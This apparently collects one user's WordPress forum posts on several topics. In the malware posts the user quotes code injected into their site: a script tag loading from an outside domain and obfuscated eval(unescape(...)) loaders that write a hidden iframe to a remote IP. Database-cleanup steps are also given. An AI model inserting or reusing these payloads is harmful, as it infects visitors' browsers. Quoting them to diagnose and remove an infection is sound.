marsie

I’m having the same problem. Hungryfeed is stripping all the CSS classes out of my feed’s description. What normally should be pulled into my WordPress page as:
<div class="field-label">Hello</div>

Is instead showing up as:
<div>Hello</div>

Is there any way to keep the classes from getting stripped out on Hungryfeed import?

Site: https://www.nyubf.org/daily-bread/
Feed: https://www.ubf.org/daily-bread.xml

Same problem here on my standalone WordPress installation. I’m not using WordPress.com.

My website was also hit with the “<script src="https://infoitpoweringgathering.com/ll.php?kk=11" type="text/javascript"></script>“ virus. I am hosted by iPower. I’ve taken the following steps to remove the malicious script from my website. Hopefully it will help others remove the viral script as well.

1. Log into iPower’s control panel. Under “Website”, click on “MySQL Database”. Click icon under “Access phpMyAdmin”.
2. In phpMyAdmin, click “Export”. Select your site’s WordPress database in the Export list. Scroll down to the bottom and check the box that says “Save as file”. Hit “Go” button on the bottom right corner of the page.
3. Once the file has been saved, you may want to make a copy of it just as backup. Now open the SQL database text file in Notepad, TextMate, Dreamweaver or the text editor of your choice. Run a search-and-replace for “<script src="https://infoitpoweringgathering.com/ll.php?kk=11" type="text/javascript"></script>“ and replace it with nothing (or a space). [Depending on how large your SQL file is, this may take up to a few dozen seconds. My SQL file was larger than 35MB and I found and replaced over 2,910 instances of the rogue script in it!]
4. Save the clean file. This is what you’ll re-import back into phpMyAdmin. Make sure you have the original (but infected) SQL file in case you encounter any errors. You may also want to do a check for any other additional rogue scripts or strange code, in case you were hit with other malicious code hacks too.
5. Wipe out your original MySQL database in phpMyAdmin by clicking Home > Databases > and your database name. Scroll to the bottom of the page, click “Check All” at the bottom of the table and select “Drop” in the drop-down. Hit the “Go” button in the bottom right corner of the page.
6. After all tables in your database have been dropped, click the “Import” tab at the top of the phpMyAdmin interface.
7. If your SQL file is less than 10MB, you can easily Import the file back into your phpMyAdmin interface. Go ahead and hit Browse and find the MySQL file you just cleaned up. Hit the “Go” button.
8. IMPORTANT NOTE: If your SQL file is LARGER than 10MB, phpMyAdmin will not allow you to upload it back from this interface. Follow these steps to import your clean SQL file back to your hosting site:

1. Download BigDump, a php script that can upload large SQL files back to your database.
2. Unzip the “bigdump.php” script and FTP upload it to a folder on your server.
3. Upload your large SQL file to the same folder as the BigDump script.
4. Navigate to your website’s directory that you created for the BigDump script, ie: https://www.domain.com/bigdump/bigdump.php
5. Find the SQL file and click the “Start Import” link. Wait until the progress bar says that the process is complete. Then you’re done! You’ve finished the work-around to import your larger-than-10MB SQL file back as your database.

• Check in phpMyAdmin that your database tables are all there and intact.
• Navigate back to your website and confirm that the WordPress site is functioning properly. After doing all of the above steps, WordPress prompted me to upgrade my database. I successfully did so.

I hope this helps. Comment back if any of you experienced anything differently. — Mary J.

I also used the following codes to display my attachments list successfully:

<li><a href="%URL%" title="%TITLE%">%ICONURL%</a> <a href="%URL%" title="%TITLE%">%TITLE%</a> (%FILESIZE%)</li>

Google Moderator is great but it requires a Google Account to vote. I wish there was an option to open polls to the public without sign-in restrictions.

My header.php file is using:

<?php wp_list_pages('title_li='); ?>

to list out my navigation, so I can’t seem to figure out a way to do it so that WordPress dynamically lists the parent pages and subpages for me (while leaving the parent page unlinked)… unless I manually hard code my parent pages with their subpages.

I’d be interested in this solution as well.

hey hallsofmontezuma, i’ll try the security plugin you suggested. thanks!

Update: I also found the damn code on every other index.php file in my entire server!

Additional corrupted files: wp-content/index.php, theme1/index.php, theme2/index.php (and every other theme index file).

I am manually deleting the malicious code on every file… But I still can’t figure out where this came from! I did some reading online and I am thinking it might be attributable to my SiteMeter counter (but am not positive).

Typo — I found the malicious code in both: index.php and wp-admin/index.php (not footer.php).

Same issue here. I have been searching online for a total solution to removing this from my WordPress installation. This has happened to me once before — and the malware code was in my footer.php file. I’m annoyed because it came back… Not sure why or how! Can anyone help?

This is the code appended after my closing </body> tag:

<script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%64%30%38%34%65%37%30%64%62%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%33%36%30%30%29%2b%27%39%61%62%34%38%34%63%62%31%36%5c%27%20%77%69%64%74%68%3d%34%30%30%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29”)); </script>
<script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%35%66%38%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%33%37%38%29%2b%27%39%63%39%5c%27%20%77%69%64%74%68%3d%31%36%32%20%6

This is how I fixed the annoying line breaks on password-protected posts:

function get_the_password_form() {
$output = '<form action="' . get_option('siteurl') . '/wp-pass.php" method="post">
<p>' . __("This post is password protected. To view it please enter your password below:") . '</p>
<p><input name="post_password" type="password" size="20" /><input type="submit" name="Submit" value="' . __("Submit") . '" /></p>
</form>
';
return $output;
}